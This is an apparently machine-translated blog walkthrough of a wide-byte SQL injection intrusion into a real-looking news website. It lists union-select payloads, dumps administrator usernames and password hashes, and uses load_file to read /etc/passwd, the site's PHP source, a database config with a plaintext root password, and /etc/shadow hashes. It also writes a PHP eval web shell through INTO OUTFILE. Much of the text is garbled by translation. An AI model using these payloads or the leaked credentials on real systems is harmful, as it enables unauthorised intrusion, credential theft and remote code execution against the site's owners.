A wide character injection Penetration Process

Site: http: // www.2cto.com (instead of the target site, rather than this site)
 
Injection point: http://www.bkjia.com/news_view.php? Id = 94
 
An error occurred while submitting % bf'. It can be seen that wide byte injection exists.
 
Then % bf % 27 and1 = 1% 23 is returned correctly
 
% Bf % 27 order by 10% 23
 
Returns the correct number of fields on the current page. The number of fields on the current page is 10.
 
Next penetration
 
% Bf % 27% 20and % 201 = 2% 20 union % 20 select %
 
Returns 3 9 if the returned result is correct.
 
The database () is named international.
 
Direct table explosion
 
Use the dual table to check whether information. schema. tables is available.
 
3 9 is returned for successful result determination, so that information_schema.table is determined.
 
Available.
 
Then replace 3 with table_name and add the query condition where TABLE_NAME =
 
0x696e74651_e6174696f6e616c international hexadecimal format
 
Return the table name I _admin, Which is preliminarily determined to be the table where the Administrator account is located.
 
Use the limit Condition
 
Next, burst the table.
 
I _admin
 
I _application_configs
 
I _application_information_step1
 
I _application_information_step2
 
I _application_information_step3
 
I _application_userbasic
 
I _count
 
I _department
 
... The following is not an explosion.
 
Then the I _admin field is cracked.
 
1, 2, 3, 4, 5, 6, 7, 8, 9, 10 frominformation_schema.COLUMNS
 
Correct return number
 
I _admin hexadecimal 0x695F61646D696E
 
The field uid is returned after the where condition is added.
 
Add the limit condition to display all fields.
 
Uid
 
M_id
 
Username
 
Password
 
Name
 
State
 
So far, all the field names of I _admin are displayed.
 
The username and password
 
The error "username" or "password" is returned ?? The uid and state are correct.
 
Hex Encoding solves problems
 
Hex (username)
 
6A73 js
 
Hex (password)
 
63316661363261616xxxxxxxxxx64323062383732666663366531303936
 
C1fa62aaeb049f62d20b872ffc6e1096
 
Rxxxxxxx7
 
Rxxxxxxx7
 
61646D696E admin
 
65313832613535xxxxxxxxxxxx366626138415166636564343631
 
Jxxxxxxxx2
 
7A687A
 
3034393830213xxxxxxxxxxxxxx466353730213337643336956438
 
Jsxxxxxxxxxxx2
 
At this point, get the background Password
 
-----------------
 
Another way of thinking
 
This is because it is the root permission ..
 
Load_file (0x2F6574632F706173737764) // read/etc/passwd file
 
Return
 
Root: x: 0: 0: root:/bin/bash
 
Bin: x: 1: 1: bin:/bin/bash
 
Daemon: x: 2: 2: daemon:/sbin/nologin
 
Adm: x: 3: 4: adm:/var/adm:/sbin/nologin
 
Lp: x: 4: 7: lp:/var/spool/lpd:/sbin/nologin
 
Sync: x: 5: 0: sync:/sbin:/bin/sync
 
Shutdown: x: 6: 0: shutdown:/sbin/shutdown
 
Halt: x: 7: 0: halt:/sbin/halt
 
Mail: x: 8: 12: mail:/var/spool/mail:/sbin/nologin
 
News: x: 9: 13: news:/etc/news: uucp: x: 10: 14: uucp:/var/spool/uucp:/sbin/nologin
 
Operator: x: 11: 0: operator:/root:/sbin/nologin
 
Games: x: 12: 100: games:/usr/games:/sbin/nologin
 
Gopher: x: 13: 30: gopher:/var/gopher:/sbin/nologin
 
Ftp: x: 14: 50: FTP User:/var/ftp:/sbin/nologin
 
Nobody: x: 99: 99: Nobody: // sbin/nologin
 
Rpm: x: 37: 37:/var/lib/rpm:/sbin/nologin
 
Messages: x: 81: 81: System message
 
Bus: // sbin/nologin
 
Vahi: x: 70: 70: Avahi
 
Daemon: // sbin/nologin
 
Mailnull: x: 47: 47:/var/spool/mqueue:/sbin/nologin
 
Smmsp: x: 51: 51:/var/spool/mqueue:/sbin/nologin
 
Nscd: x: 28: 28: NSCD
 
Daemon: // sbin/nologin
 
Vcsa: x: 69: 69: virtual
 
Console memory owner:/dev:/sbin/nologin
 
Rpc: x: 32: 32: Portmapper
 
RPC user: // sbin/nologin
 
Rpcuser: x: 29: 29: RPC Service
 
User:/var/lib/nfs:/sbin/nologin
 
Nfsnobody: x: 65534: 65534: Anonymous NFS
 
User:/var/lib/nfs:/sbin/nologin
 
Sshd: x: 74: 74: Privilege-separated
 
SSH:/var/empty/sshd:/sbin/nologin
 
Pcap: x: 77: 77:/var/arpwatch:/sbin/nologin
 
Haldaemon: x: 68: 68: HALdaemon: // sbin/nologin
 
Xfs: x: 43: 43: X Font
 
Server:/etc/X11/fs:/sbin/nologin
 
Mysql: x: 500: 500:/home/mysql:/bin/bash
 
Apache: x: 48: 48: Apache:/var/www:/sbin/nologin
 
Ntp: x: 38: 38:/etc/ntp:/sbin/nologin
 
Zf_job: x: 501: 501:/opt/www_application/job:/bin/bash
 
Angang523409: x: 502: 0:/home/angang523409:/bin/bash
 
Syyy: x: 503: 503:/opt/www_application/syyy:/bin/bash
 
Website directory
 
Read:/opt/www_application/xxxxx/news_view.php
 
Bytes
 
Replace (load_file (bytes), char (60), char (32 ))
 
? Php shortde_once ('Global. php '); if (isset ($ _ GET [id]) {$ SQL = "update I _newsbase set hits = hits + 1 where id = ". $ _ GET [id]; mysql_query ($ SQL ); $ query_view = mysql_query ("SELECT * FROM 'I _ newsbase 'where 'id' =' $ _ GET [id] ';"); $ row_view = mysql_fetch_array ($ query_view) ;}?>! DOCTYPE html PUBLIC "-// W3C // dtd xhtml 1.0 Transitional // EN "" http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd "> Htmlxmlns =" http://www.w3.org/1999/xhtml "> Head> metahttp-equiv =" Content-Type "content =" text/html; charset = GB2312 "/> title>? = $ Row_view [title]?> -? = $ Row_arr [websitename]?> /Title>? Php include_once ('header. php');?>! -Contene-> div id = "contene _"> divid = "box_l"> div id = "box_r"> divid = "l_box"> div class = "h_700"> div class = "blue"> h3> Focus News/h3>/div>? Php $ query_news = mysql_query ("SELECT * FROM 'I _ newsbase 'order by 'date _ time' desc limit 12"); while ($ row_news = mysql_fetch_array ($ query_news )) {?> P class = "p"> span> atitle = "? = $ Row_news [title]?>" Href = "news_view.php? Id =? = $ Row_news [id]?> ">? Php if (strlen ($ row_news [title])> 40) {echo $ db-> titlesubstr ($ row_news [title )."..." ;} Else echo $ row_news [title];?> /A>/span>/p>? Php }?> /P>/div> div id = "box_l _"> divid = "box_r _"> div id = "r_box"> div class = "blue"> h3> a href = "index. php "> Home/a> span>»/span> a href =" news_list.php "> News/a>/h3>/div> div class =" text "> div class = "title">? Php $ query_all = mysql_query ("SELECT * FROM 'I _ newsbase' as 'A', 'I _ newscontent' as 'B' where 'A '. 'id' = 'B '. 'nid' and 'A '. 'id' = '$ _ GET [id] 'limit 1; "); $ row_all = mysql_fetch_array ($ query_all);?> Divalign = "center">? = $ Row_all [title]?> /Div> p>/p> pclass = "font" align = "center"> Date :? = Date ("Y-m-d", $ row_all [date_time])?> /P>/div>? = $ Row_all [content]?> /Div> div class = "clear">/div> div class = "clear">/div> div id = "ad">/ div>/div>? Php shortde_once ('footer. php');?>
 
Then read
 
Global. php
 
/Opt/www_application/xxxxx/global. php
 
Bytes
 
Replace (load_file (bytes), char (60), char (32 ))
 
Return
 
? Php include_once ('. /configs/config. php '); include_once ('. /common/mysql. class. php '); include_once ('. /common/action. class. php '); include_once ('. /common/page. class. php '); $ db = new action ($ mydbhost, $ mydbuser, $ mydbpw, $ mydbname, ALL_PS, $ mydbcharset ); $ query_config = $ db-> query ("SELECT * FROM 'I _ config'"); while ($ row_config = $ db-> fetch_array ($ query_config )) {$ row_arr [$ row_config [name] = $ row_config [values ]; $ Row_eng [$ row_config [name] = $ row_config [xxxxx_values];}?>
 
Read./configs/config. php
 
/Opt/www_application/xxxxx/configs/config. php
 
/Opt/www_application/configs/config. php
 
Bytes
 
Replace (load_file (bytes), char (60), char (32 ))
 
Return NULL ........ This file does not exist
 
/Opt/www_application/xxxxx/configs/config. php
 
Bytes
 
Replace (load_file (bytes), char (60), char (32 ))
 
Return Value:
 
? Php include_once ('db _ config. php '); include_once ('variable _ config. php '); /*************************************** * ************************************ upload image parameter description: $ max_file_size: the size limit of the uploaded file. Unit: BYTE $ destination_folder: Upload File Path $ watermark: whether to append the watermark (1 indicates adding the watermark, and others indicates not adding the watermark). Usage: 1. set PHP. remove the SN of the line "extension = php_gd2.dll" in the INI file because the GD library is used. 2. change extension_dir = to the directory where your php_gd2.dll is located; ************************************ **************************************** ** // List of uploaded file types $ uptypes = array ('image/jpg ', 'image/jpeg ', 'image/png', 'image/pjpeg ', 'image/gif', 'image/bmp ', 'image/x-png '); $ max_file_size = 2000000; // the size of the uploaded file. The unit is BYTE $ destination_folder = "uploading/"; // the path of the uploaded file $ watermark = 1; // whether or not to add a watermark (1 is a watermark, others are not a watermark); $ watertype = 1; // watermark type (1 is text, 2 is image) $ waterposition = 1; // watermark position (1 indicates the lower left corner, 2 indicates the lower right corner, 3 indicates the upper left corner, 4 indicates the upper right corner, and 5 indicates the center); $ waterstring = "TY"; // watermark character Serial watermark image watermark ”xplore.gif "; // watermark image $ imgpreview = 1; // whether to generate a preview image (1 is generated, others are not generated); $ imgpreviewsize = 1/1; // ratio of thumbnails?>
 
/Opt/www_application/xxxxx/configs/db_config.php
 
Bytes
 
Replace (load_file (bytes), char (60), char (32 ))
 
Return
 
X
 
? Php // This file is the file that stores the variables of the user database $ mydbhost = "localhost"; $ mydbuser = "root"; $ mydbpw = "xyw1120 ″; $ mydbname = "international"; $ mydbcharset = "GBK";?>
 
Objective: mysql account root and password xyw1120
 
/Opt/www_application/xxxxx/1.php
 
Select "dddd" into outfile '/var/www/data/suddytest. php'
 
Select '<? Php eval ($ _ POST [cmd])?> 'Into outfile' D:/PHPnow-1.5.4/htdocs/index2.php'
Select '<? Php echo "HelloWorld";?> 'Into outfile'/opt/www_application/xxxxx/index2.php'
 
757365726E616D65
 
/Etc/vpn/server. conf
 
0x2F6574632F76706E2F736572766572 E636F6E66
 
Replace (load_file (0x2F6574632F76706E2F736572766572E636F6E66), char (60), char (32 ))
 
Replace (load_file (0x2F6574632F76706E2F736572766572E636F6E66), char (60), char (32 ))
 
Scan the port
 
80 Open
 
111 Open
 
1723 Open
 
3306 Open
 
1723 vpn port, from this perspective ..... Next penetration
 
Read/etc/shadow
0x2f6574632f742561646f77
 
Replace (load_file (0x2f6574632f742561646f77), char (60), char (32 ))
 
The content is as follows: www.2cto.com
 
Root: $1 $ PqDYAJMy $ nrwxVO7zGgQsd. cNfzOSp0: 14731: 0: 99999: 7: bin: $1 $ v/3WmY2W $ jUw9sPr2kDkW0BvNB63gO.: 14847: 0: 99999: 7: daemon: *: 14215: 0: 99999: 7: adm: *: 14215: 0: 99999: 7 ::: lp: *: 14215: 0: 99999: 7: sync: *: 14215: 0: 99999: 7: shutdown: *: 14215: 0: 99999: 7: 7:: halt: *: 14215: 0: 99999: 7: mail: *: 14215: 0: 99999: 7: news: *: 14215: 0: 99999: 7: uucp: *: 14215: 0: 99999: 7: operator: *: 14215: 0: 99999: 7: games: *: 14215: 0: 99999: 7: gopher: *: 14215: 0: 99999: 7: ftp: *: 14215: 0: 99999: 7: nobody: *: 14215: 0: 99999: 7 ::: rpm :!!: 14215: 0: 99999: 7: Success :!!: 14215: 0: 99999: 7: avahi :!!: 14215: 0: 99999: 7: mailnull :!!: 14215: 0: 99999: 7: smmsp :!!: 14215: 0: 99999: 7: nscd :!!: 14215: 0: 99999: 7: vcsa :!!: 14215: 0: 99999: 7: rpc :!!: 14215: 0: 99999: 7: rpcuser :!!: 14215: 0: 99999: 7: nfsnobody :!!: 14215: 0: 99999: 7: sshd :!!: 14215: 0: 99999: 7: pcap :!!: 14215: 0: 99999: 7: haldaemon :!!: 14215: 0: 99999: 7: xfs :!!: 14215: 0: 99999: 7: mysql :!!: 14218: 0: 99999: 7: apache :!!: 14221 ::::: ntp :!!: 14545 ::::: zf_job: $1 $. EE7dw2F $/G1ObIx0vfXZsZ/DBid/z0: 14728: 0: 99999: 7: angang523409: $1 $ vA29oCDp $ Signature: 14747: 0: 99999: 7: syyy: $1 $38 W/v5/Z $ L5K9oIAdaFHH8js6fODFL/: 15265: 0: 99999: 7 :::
 
By 137747998@qq.com